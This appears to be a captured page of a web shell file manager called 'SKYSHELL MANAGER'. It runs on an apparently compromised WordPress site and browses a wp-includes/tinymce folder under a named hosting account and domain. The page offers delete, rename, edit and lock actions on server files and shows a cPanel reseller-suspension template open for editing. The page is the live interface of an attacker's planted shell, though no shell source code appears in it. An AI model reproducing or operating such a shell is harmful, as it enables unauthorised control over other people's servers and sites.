📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: suspendreseller.tmpl
[% SET breadcrumburl = '/scripts2/statres' -%] [% IF ! data.reseller -%] [% PROCESS 'master_templates/_defheader.tmpl' theme="yui" -%] <b>No reseller provided.</b> [% PROCESS 'master_templates/_deffooter.tmpl' theme="yui" -%] [% ELSE -%] [% PROCESS 'master_templates/_defheader.tmpl' theme="yui" -%] <h3 class="simpleheading">[% data.un ? 'Unsuspend' : 'Suspend' %] accounts for [% data.reseller %]</h3> <pre> [% print_from_handle( data.filehandle ); -%] </pre> <br /> <h3>Complete!</h3> [% PROCESS 'master_templates/_deffooter.tmpl' theme="yui" -%] [% END -%]
Save